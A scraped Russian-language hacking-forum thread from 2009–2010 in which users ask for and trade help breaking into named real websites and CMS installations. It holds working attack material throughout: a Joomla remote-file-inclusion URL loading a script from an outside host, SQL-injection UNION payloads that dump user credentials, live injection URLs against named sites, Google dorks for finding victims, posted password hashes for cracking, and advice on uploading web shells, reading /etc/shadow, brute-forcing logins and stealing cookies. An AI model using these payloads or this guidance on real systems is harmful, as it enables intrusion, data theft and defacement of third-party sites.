Эксплоиты (http://www.winzone.ru/articles/286/)

dimanqweasdzxc
22.03.2009, 20:32
Добрый день!!
Что такое XSS и как им пользоваться???
Дай пожалуйста ссыль и подробное описание...


Заранеее благодарен...

NoDevil
23.03.2009, 01:53
Добрый День.
Такой вопрос.
сайт: http://www.pn.by/
движок: http://www.webdirector.ru/ (версию незнаю.)

Вопрос: открыта папка с конфигом http://pn.by/webdirector/core/

Что я могу сделать. И как.

Заранее спасибо!

Предваритольно будет такой доступ всего 2-3 дня.

][yZ
23.03.2009, 10:18
Ниче ты не сможешь сделать...

heretic1990
23.03.2009, 17:33
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?

InFlame
25.03.2009, 20:01
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
По 5 паролей в 15 минут? Удачи! :)
P.S. На всех серьёзных двигах защита от брута стоит.

heretic1990
25.03.2009, 21:46
По 5 паролей в 15 минут? Удачи! :)
P.S. На всех серьёзных двигах защита от брута стоит.
мне надо так:
login1:pass
login2:pass
login3:pass
login4:pass

пробовал гидрой, не получается((

Dr.Gonzo
26.03.2009, 12:20
Кто-нибудь может подсказать, что за ерунда:
Уже не первый раз встречается сайт на asp, ссылка вида: http://www.сайт.ru/?p=далее какое-нибудь слово, например news
Подставляешь туда что-нибудь, выдает:

Server Error in '/' Application.
There is no row at position 0.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.IndexOutOfRangeException: There is no row at position 0.

Source Error:

Line 1: <%@ Page Language="c#" Debug="true" Codebehind="default.aspx.cs" AutoEventWireup="false" Inherits="бла бла бла" %>
Line 2: <% = GetWebPage() %>


Source File: c:\inetpub\vhosts\сайт.ru\httpdocs\default.asp x Line: 2

Читал статьи по взлому асп, ничего не нашел толкового.
Команды выполнять не дает

jangle
26.03.2009, 12:51
подскажите, как залить шелл в SupportSuite

problema
26.03.2009, 16:21
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
многопоточным проксевым брутом :( к сожалению в паблике такого ты не найдешь

mailbrush
26.03.2009, 16:28
Еще приватного тоже не видел...

problema
26.03.2009, 17:04
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
можешь попробовать это, возможно поможет: http://forum.antichat.ru/thread109600.html

HIVER
26.03.2009, 18:11
Читал статьи по взлому асп, ничего не нашел толкового.
Команды выполнять не дает
Сколько раз трогал асп, либо MSSQL, либо XML в качестве баз данных.

Seshh
26.03.2009, 18:20
Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???

problema
26.03.2009, 18:37
Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
на майл.ру в куках пароль не хранится, ты можешь только подменить куки и зайти на ящик жертвы, и то при условии если сессия не умерла

mailbrush
26.03.2009, 18:47
Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.

problema
26.03.2009, 18:56
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.
ОМГ сервис для расшифровки куки от mail.ru который добудет пароль?

Seshh
26.03.2009, 20:13
Можно. Для этого и существуют сервисы хешкрекинг, етк... Проги разные.

Можно ссылку хоть на один подобный сервис ? :)

M4g
27.03.2009, 00:33
plain-text.info - самый навороченный
hashcracking.info - сервис ачата
--
а вообще по сабжу майл.ру это мало чем поможет

-Hormold-
27.03.2009, 01:46
plain-text.info - самый навороченный
hashcracking.info - сервис ачата
http://rafal.jelito.org/md5.php - думаю это лучше всего...

Seshh
27.03.2009, 11:09
Спасибо щас заценим.

kasper666
27.03.2009, 16:18
Посоветуйте двиг для форума. Не глюкавый. Быстрый.

bolnoy
27.03.2009, 16:25
имхо лучший vBulletin
быстрый SMF

trat1g
03.04.2009, 10:40
http://yamegastar.ru/ тут открыт раздел plugins. там я нашёл вроде как бы скрипт, для переименование картинок...когда заливаешь туда авы, фотки, он переименовывает их. можно как нить над ним поколдовать и послать запрос на переименование файла из .gif в .php. если нет, то что тогда можно?)))))))


P.S. Если я туплю так и скажите =) я полный ноль в этом деле)))) учусь.

спасибо ребятушки =)

-m0rgan-
03.04.2009, 22:26
trat1g, я не представляю как это =/
Со скриптом не работал, но из моего опыта скрипты такого рода проверяют расширение загружаемого файла, и переиминовуют то что стоит скажем перед .gif

Pay
25.04.2009, 13:30
Есть phpizabi.net - PHPizabi 0.848b C1
её взломал(уже не первый раз)
By_MuCaHiT (DarkKnight) ~ Real_Karizma

перезаписан conf.inc файл.

вопрос: как защитить движок от взлома? кто сталкивался с такими траблами?

-=Nicon=-
04.05.2009, 18:44
Есть сайт на IP.Board 2.3.1 хочу его взломать, кто может подсказать какие есть уязвимости у этой CMS системы.

mailbrush
04.05.2009, 18:47
Это не cms, а форум. Целая тема по уязвимостям есть http://forum.antichat.ru/thread89112.html.

SaFiK
12.05.2009, 18:13
Люди, кто знает уязвимости на файлообменнике Letitbit ? можно ли его ломануть ?

Failure
12.05.2009, 18:24
топором по серверу, может и ломонешь, если ты о обходе таймера - юзай прокси или плагин (уже 100 лет как есть) что бы сразу показывало ссылку на скачивание
если ты про такие вещи как дефейс, от скажу: ололо

reega
13.05.2009, 03:54
Можно ли узнать текущий пароль пользователя на сайте с движком DLE 8 версии???
доступ к базе вроде получил, скачал. зашифрованый пароль где то тут:

'e7e4806514adfd4171437dfd51f9e495', 'eric', 4, 0, 1, 3, '1241397821', '1240442341', '', 1, '', '', '', '', '', '', '', 0, 0, '', '', '', '', '194.186.188.36', 0, 0, ''),

кто умеет отпишите в личку. или сюда способ.

Alfer
18.05.2009, 20:49
Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?

Noker
04.06.2009, 13:21
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?

-=Razor=-
07.06.2009, 03:48
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt

Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии

Exploit: http://milw0rm.com/id.php?id=44

hookman
07.06.2009, 06:53
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.

hookman
09.06.2009, 07:00
Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll.
при запросе
index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/*
ошибок нет, слепой тоже вроди нету.
при запросе
index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/*
Выдаёт ошибку следующего вида
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id= далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно

если это поможет вот этот эрор из исходника страницы
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go(-1);" />

Собсно подскажите чё с этим можно сделать ибо я в потерях.

AGRESOR
14.06.2009, 15:14
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?

KaZ@NoVa
14.06.2009, 21:38
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян...
А вообще попробуй его подгрузить как картинку если есть такая возможность..

вот здесь искал??
http://damagelab.org/lofiversion/index.php?t=16780

MaXoH999
15.06.2009, 19:43
Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?

Rubaka
15.06.2009, 19:56
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!

hookman
15.06.2009, 21:20
Подскажите как залить шел в админке mambo 4.0.14 Stable.
мамботы, компоненты, модули... обично такип образом заливал, но в данной версии такого вообще нет.

MaXoH999
16.06.2009, 01:57
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль?
Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?

Dark_cracker
16.06.2009, 11:23
или узнать фтп логин и пароль?
Ищи через шелл файлы-логи на серваке может там чё нить нароешь, и ещё посмотри этот файл etc/shadow (если есть права).

geforse
16.06.2009, 12:46
Как сбрутить хеши из WordPress'a ?
На hashcracking.info пишет: Тип хеша неопределен!


nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1
malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/
SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1

Dark_cracker
16.06.2009, 12:49
Как сбрутить хеши из WordPress'a ?
На hashcracking.info пишет: Тип хеша неопределен!


nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1
malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/
SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1

Через программы (passwordspro), брутом, у wordPress хеш + соль тебе в этот раздел _http://forum.antichat.ru/thread46700.html

InFlame
16.06.2009, 17:48
Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это :)
P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.

KaZ@NoVa
16.06.2009, 19:03
Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это :)
P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.
а в админку доступ есть?
кинь сайт какой нидь с этой байдой

InFlame
16.06.2009, 19:26
2KaZ@NoVa
в админку доступ есть, сайт находится в локалке.

DATA_batona
22.06.2009, 01:56
Народ, подскажите плиз, где искать дыру для шелла http://tonystudio.ru/wordpress/wp-content/plugins/
теорию вроде прочитал, а на практике - хожу по кругу, не найду где зацепится. если можно, пинок в нужном направлении.
З.Ы. ссори если не туда запостил.

GL_Loney
22.06.2009, 22:25
Парни, если не сложно подскажите самый оптимальный движег для mmorpg , чтобы и не сложный был и поюзать не плохо можно было -_- спасибо заранее.

reanim
01.07.2009, 22:14
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)

DJSTIVE
15.07.2009, 22:02
какие есть варианты залития шелла в тп1.0.1 без аддминки???

it's my
16.07.2009, 06:10
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)
никак

it's my
16.07.2009, 06:16
Народ, подскажите плиз, где искать дыру для шелла http://tonystudio.ru/wordpress/wp-content/plugins/
теорию вроде прочитал, а на практике - хожу по кругу, не найду где зацепится. если можно, пинок в нужном направлении.
З.Ы. ссори если не туда запостил.
http://www.google.com/search?q=wordpress+vuln

sNt
16.07.2009, 06:34
Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9
Заранее спасибо :)

Что-то из серии "как трахнуть девушку, не доставая член". В любом случае придется получить каким-то образом рут доступ, сплоитом или вручную - это уже другой вопрос.

InFlame
17.07.2009, 19:02
Почему на таких движках как, например, DLE, Vbulletin при эксплуатации XSS приходит только часть куков. То есть самое интересное (hash пароля, например) не приходит на сниффер.
Есть ли варианты решения этой проблемы?

it's my
18.07.2009, 10:17
потому что не хранится хэш в куках

InFlame
18.07.2009, 14:24
Но ведь если заглянуть у себя в куки, то там находится больше параметров, чем приходит на сниффер. Например id сессии на сниффер не приходит. Почему?

it's my
19.07.2009, 08:03
Но ведь если заглянуть у себя в куки, то там находится больше параметров, чем приходит на сниффер. Например id сессии на сниффер не приходит. Почему?
сессия живет ограниченное колличество времени

InFlame
20.07.2009, 14:29
Ладно. Возьмём DataLife Engine. Если в адресную строку ввести javascript:alert(document.cookie), то я увижу только два параметра из кукисов:
PHPSESSID=bc0c66c56778c89daca4f2c001ca1695; dle_onl_session=bc0c66c56778c89daca4f2c001ca1695
А если в Опере зайти в "Управление cookies", то там увижу ещё такие параметры, как: dle_password, dle_user_id и т.д. Возникает вопрос, почему скрипт выплёвывает не всё содержимое кукисов (точно так же и на сниффер приходит только 2 ненужных параметра)? Куда деваются dle_password, dle_user_id? Никто не подскажет? :)

aydin-ka
12.08.2009, 15:18
Есть ли уязвимость в UcOz ????

maxiox
12.08.2009, 16:00
Есть XSS

u36a
13.08.2009, 15:52
Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>

Какие есть способы залить шел?

Есть доступ к бд, где таблицы dle полный (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

todd753
17.08.2009, 14:35
как быстро найти уязвимые сайты?

M4g
17.08.2009, 15:31
1. milw0rm.com
2. в эксплойтах обычно пишут dork: "что-то"
3. ищещь дорк в гугле и юзаешь сплойт)

todd753
17.08.2009, 17:55
1. milw0rm.com
2. в эксплойтах обычно пишут dork: "что-то"
3. ищещь дорк в гугле и юзаешь сплойт)

как найти уязвимый сайт, для инекции, не юзать гугл на пример запросами типа
inurl:"download.php?id="
inurl:"downloads.php?id="
inurl:"index.php?id="
inurl:"sql.php?id="
inurl:"page.php?id="
inurl:"site.php?id="
inurl:"open.php?id="
inurl:"catalog.php?id="
inurl:"register.php?id="
inurl:"make.php?id="
inurl:"good.php?id="
inurl:"mp3.php?id="

и к каждой станице подставлть (')

Komyak
18.08.2009, 12:29
Help! Слил базу с сайта. Теперь проблема слить сам сайт- самопис. При попытке запаковки выдаёт- Can't call archivator (tar cfzv..... Хотя при дампировании Sypex-ом нормально заархивировалось.
Не представляю что ещё можно сделать. Подскажите.

it's my
18.08.2009, 13:47
Help! Слил базу с сайта. Теперь проблема слить сам сайт- самопис. При попытке запаковки выдаёт- Can't call archivator (tar cfzv..... Хотя при дампировании Sypex-ом нормально заархивировалось.
Не представляю что ещё можно сделать. Подскажите.
pixelbeat.org/cmdline_ru_RU.html
compdoc.ru/os/linux/commands_linux_command_line/

steep7
21.08.2009, 00:52
Помогите взломать сайт Joomla ! ver. 1.0.9
Я вытащил хэш с помощью exploit. А расшифровать увы не получается.

allinurl:"com_frontpage"
inurl:"/index.php?option=com_frontpage"

Можно ли вытащить пароль с сайта ?
И ещё почему когда я пытаюсь сохранить exploit под названием Joomla <= 1.0.9 Weblinks blind SQL injection он сам удалятся ?

6@llT0
21.08.2009, 01:39
А каким вообше образом можно попасть на диск C какого нибудь сайта?

monolog
21.08.2009, 04:19
А каким вообше образом можно попасть на диск C какого нибудь сайта?
если именно в диск С, то как минимум нежно найти уязвимый сайт, который работает на сервере который работает на Windows платформе, с помощью которой нужно залить шелл и получить как минимум права на выполнение команд на стороне сервера.

Shadrin
26.08.2009, 04:07
Кто как ищет?есть ли какие-то конкретные способы их поиска,если сообщения об ошибках не выводятся.
спасибо! :)

warlok
26.08.2009, 04:20
можно поискать раскрытие путей или старые ошибки в кеше гугла, также если есть возможность просматривать локальные файлы например через скулю можно угадать путь до конфига апача или логов и там спалить пути или тупо самому подобрать.

HAXTA4OK
26.08.2009, 11:00
можно пытать счасьтье так sait.ru/index.php?id[]=

если есть load_file у тебя то вот тебе http://forum.antichat.ru/thread49775.html
там куча путей подставляй , ищи *conf в нем прописан путь


пробуй искать файлы кторые инклудятся , иногда пройдя по ним можно увидеть тож путь

Shadrin
12.09.2009, 03:28
Народ кто нить заливал шелл в ВП 2.7.1 ?
админка разумееться есть
Аналогично 2.3.3 MU,разрешал загрузку пхп файлов,всеравно труба :confused:

warlok
12.09.2009, 04:08
если неошибась в админке есть возможность редактировать файлы если конечно права позволяют.

Shadrin
12.09.2009, 04:57
где именно?

z00MAN
12.09.2009, 07:30
где именно?
в Theme Editor

Shadrin
12.09.2009, 07:36
в редакторе тем не когда прав нету, другие варианты есть?
раньше канало shell.jpg.php, щас уже траблы :confused:

pumbo
21.09.2009, 12:20
Подскажите, можт кто знает, как раскрыть путь установки в Joomla 1.5.12 ?
Спасибо.

ATLANT_93
23.09.2009, 14:44
Как попасть в админку в joomla 1.0.12 Lavra Edition?

Shadrin
23.09.2009, 15:00
ввести логин:пароль, и зайти.
по ней можно найти инфу в инете,если пути в ней отличаются от стандартных джумл

ZiLiBoBa
01.10.2009, 21:54
извеняюсь скорее всего не туда пишу....но может ктонить мне объяснит что это
http://www.bruno-banani-message.de/popup.probe.php

Shadrin
04.10.2009, 20:02
в ВП 2.8.4 кто нить шелл заливал через админку?

oxod
14.10.2009, 20:45
Интересует ncms (ncms.ru) демка у нее не работает.
Уязвимости или сами скрипты ncms, можно в зенде, всем заранее спасибо.

CryptAnalitic
16.10.2009, 19:22
в ВП 2.8.4 кто нить шелл заливал через админку?
Есть только приватные эксплоиты к этой версии( А в чем проблема ?

CryptAnalitic
16.10.2009, 19:23
Насколько robots.txt актуален сейчас как расскрытие папок сайта?

gisTy
16.10.2009, 21:21
Настолько же, насколько и раньше, то есть неактуален. Ну кто станет писать суперсекретные папки в robots.txt?!
владелец сайта, который не хочет чтобы поисковой бот индексировал некоторые стрницы

diehard
16.10.2009, 21:45
Настолько же, насколько и раньше, то есть неактуален. Ну кто станет писать суперсекретные папки в robots.txt?!
еще и как пишут))) админки в основном

Roston
17.10.2009, 17:33
Здрасте... подскажите как залить шелл через админку в ДЛЕ. Точой версии сказать не могу.
Модуль "Архив файлов" отсутствует. Добавил в допустимые файлы для загрузки расширения .php .phtml но когда добавляю новость и загружаю файл и после этого кликаю на файлик то происходит загрузка файла в виде download.php?id=7. Подскажите как выйти из ситуации

_gr34t
27.10.2009, 20:31
Кто-нибудь знает хотя бы один способ раскрыть пути в Drupal?

ErrorNeo
07.11.2009, 17:31
сабж
касается солей хэшей в Vbulletin

в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.

примеры 4-символьных солей
VBulletin:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
YD\
],\
W$\
]_\
Dd\

вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?

$n@ke
11.11.2009, 17:12
Какой тип хеша у Битрикс?
Вроде md5($pass) , но хеш странный очень:
пример - _Ah7\x2Ofb6e1ad1bf85366d9a91b6e43b87f53b

[aywo]
11.11.2009, 18:59
в 7-й версии битрикс использует чистый мд5 (32 символа) а в 8-й версии хеш уже 40 символов, то есть неободимо отбросить ненужные символы (salt) то есть в данном случае хеш будет выглядеть так :
fb6e1ad1bf85366d9a91b6e43b87f53b

growhel
24.11.2009, 23:13
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?:)

S[N]EP
25.11.2009, 01:06
кто нибудь знает как залить шел в Instantcms, доступ в админку есть.

m0Hze
25.11.2009, 01:15
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?:)
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.

growhel
25.11.2009, 01:57
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto

оригинал

m0Hze
25.11.2009, 09:21
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto

оригинал
Эм

Ошибка: У Вас нет прав для доступа к этому модулю.

Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.

FaTRuS
03.01.2010, 19:57
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???

m0Hze
03.01.2010, 20:39
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".

m0Hze
03.01.2010, 20:43
сабж
касается солей хэшей в Vbulletin

в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.

примеры 4-символьных солей
VBulletin:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
YD\
],\
W$\
]_\
Dd\

вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?
Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:

\'*( - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью.
(&\\ - слуш экранируеться,так как последний слеш являеться частью соли.

Подругому не бывает :)
ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();

FaTRuS
03.01.2010, 21:16
www.prima-group.kz

m0Hze
03.01.2010, 21:29
www.prima-group.kz
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.

FaTRuS
03.01.2010, 22:26
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9

Можно ли вытащить логин и пароль от админки

m0Hze
03.01.2010, 22:31
www.prima-group.kz
http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%2 8%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+

m0Hze
03.01.2010, 23:04
http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9

Можно ли вытащить логин и пароль от админки
Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами.
Скриптом достал спиоск таблиц,может пригодиться.

COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CHANNEL
CHANNEL_NEW
CHANNEL_POLL
NEWS
NEWS1
POLL
PRICES

FaTRuS
04.01.2010, 10:22
если можешь поделись скриптом плз можешь в личку

ЭТО НЕ СПЕЦ РАЗДЕЛ ДЛЯ ТВОИХ ВОПРОСОВ

Здесь не спрашивают как тебе поломать сайт , или что с этим можно сделать//HAXTA4OK

vsid55
06.01.2010, 03:45
Подскажите чем брутить wordpress?

StarFire
06.01.2010, 04:06
Подскажите чем брутить wordpress?
hydra

hellorin
10.01.2010, 17:41
Подскажите пожалуйста есть ли какие-то уязвимости в движках:
NPJ (http://npj.ru/)
и
WebGui (http://www.webgui.org/)

Если есть то какие :)

FaTRuS
15.01.2010, 08:04
У меня возник вопрос есть сайты у которы структуре php немного изменена
Допустим http://www.mister-wong.ru/stuff/#toolbar подвержены ли такие сайты уязвимостям типа sql inj или другим уязвимостям

sqlinjector
15.01.2010, 18:35
Уважаемые, несколько раз натыкался на всякие php скрипты - они же exploit-ы к форумам типа IPB и PHPBB, в.т.ч. и 3 версии.
Просьба: подскажите тему, где есть полная информация о том как этим делом пользоваться.
ОС, софт и тд..
Вот по инъекциям нашел такой ФАК http://www.hackzone.ru/news/sql_inj.html очень мне помог, хотелось бы и по cross site scripting-у
В общем в итоге хочется залить шелл, получить админа сайта как минимум.
пишите тут или в личку.. Большое спасибо!

kaban931
15.01.2010, 21:51
Привет всем! народ подскажите пожалуйста что означает вот эта вот ошибочка

! PHP for the selected domain has failed.

Installatron is unable to install to a domain where PHP is not working.

Your hosting provider can help you resolve this error.

Error code: 1; HTTP code: 500
Заранее спасибо!

globalDJs
21.01.2010, 20:30
Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.

wkar
22.01.2010, 12:51
Залей шелл.

Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.

$n@ke
31.01.2010, 20:33
//сцк,снова 2 символа
про хеши - читай:
http://forum.antichat.ru/thread155032.html

hackmen
19.02.2010, 21:51
Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.

Спасибо!

cj69
23.02.2010, 01:00
Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html

вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?

cryostat13
25.02.2010, 00:24
Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];

GC0mmander
18.04.2010, 16:54
Есть ли какой-нибудь способ заливки шелла через DokuWiki?

mr.celt
22.04.2010, 11:46
День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.

iSlava
08.05.2010, 22:44
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blahid=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?

mr.celt
10.05.2010, 18:24
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blahid=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?

Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/

aydin-ka
15.05.2010, 10:06
Как узнать версию 1c-bitrix на сайте! не имея доступ в админку????

Daedalus
26.05.2010, 21:09
подскажите пожалуйста как можно залить шелл в Webmin cms или раскрытие путей какое-нибудь
вот сайт-пример http://hotel-kyniska.gr/administration/ логин-пасс:kyniska
php код в articles фильтруется.

iSlava
27.05.2010, 21:23
помогите найти админку в multishopcms http://www.multishopcms.com

Konqi
27.05.2010, 21:25
помогите найти админку в multishopcms http://www.multishopcms.com


http://www.multishopcms.com/design/user/

iSlava
27.05.2010, 21:30
оно forbidden же. доступ мне никак не получить?

SnooPy
27.05.2010, 21:35
http://www.multishopcms.com/admin.php

iSlava
27.05.2010, 21:39
мде. у меня несколько сайтов на этой цмс. админ.пхп там естессн нет

Wmzer
03.06.2010, 16:00
Облазил весь форум, но так четко нечего и не нашел...
Покажите темы, или напишите подробно о:
Как получить доступ к админке на WordPress 2.9.2?
